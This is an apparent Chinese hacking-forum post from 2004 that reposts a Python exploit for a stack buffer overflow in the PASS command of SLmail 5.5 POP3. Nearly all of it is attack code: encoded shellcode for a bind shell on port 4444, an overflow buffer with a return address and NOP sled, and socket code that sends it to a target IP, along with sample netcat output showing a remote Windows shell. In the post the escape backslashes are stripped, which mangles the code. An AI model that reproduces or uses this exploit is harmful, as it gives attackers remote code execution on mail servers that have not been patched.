‹‹ 上一主题 | 下一主题 ››
发新话题
打印

SLmail 5.x POP3 Remote Pass Buffer Overflow Exploit

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9869 
精华
771 
积分
40986 
阅读权限
200 
性别
男 
在线时间
3986 小时 
注册时间
2004-7-4 
最后登录
2008-12-3 
楼主 发表于 2004-11-20 04:25  只看该作者

SLmail 5.x POP3 Remote Pass Buffer Overflow Exploit

文章作者:Muts
复制内容到剪贴板
代码:
######################################
#                                                 #
# SLmail 5.5 POP3 PASS Buffer Overflow             #
# Discovered by : Muts                             #
# Coded by : Muts                                 #
# [url]WWW.WHITEHAT.CO.IL[/url]                          #
# Plain vanilla stack overflow in the PASS command  #
#                                                 #
######################################
# D:ProjectsBO>SLmail-5.5-POP3-PASS.py         #
######################################
# D:ProjectsBO>nc -v 192.168.1.167 4444         #
# localhost.lan [192.168.1.167] 4444 (?) open      #  
# Microsoft Windows 2000 [Version 5.00.2195]      #
# (C) Copyright 1985-2000 Microsoft Corp.          #
# C:Program FilesSLmailSystem>                 #
######################################

import struct
import socket

print "nn############################"
print "nSLmail 5.5 POP3 PASS Buffer Overflow"
print "nFound & coded by muts [at] whitehat.co.il"
print "nFor Educational Purposes Only!"
print "nn############################"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"

#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = &#39;x41&#39; * 4654 + struct.pack(&#39;<L&#39;, 0x783d6ddf) + &#39;x90&#39;*32 + sc
try:
print "nSending evil buffer..."
s.connect((&#39;192.168.1.167&#39;,110))
data = s.recv(1024)
s.send(&#39;USER username&#39; +&#39;rn&#39;)
data = s.recv(1024)
s.send(&#39;PASS &#39; + buffer + &#39;rn&#39;)
data = s.recv(1024)
s.close()
print "nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题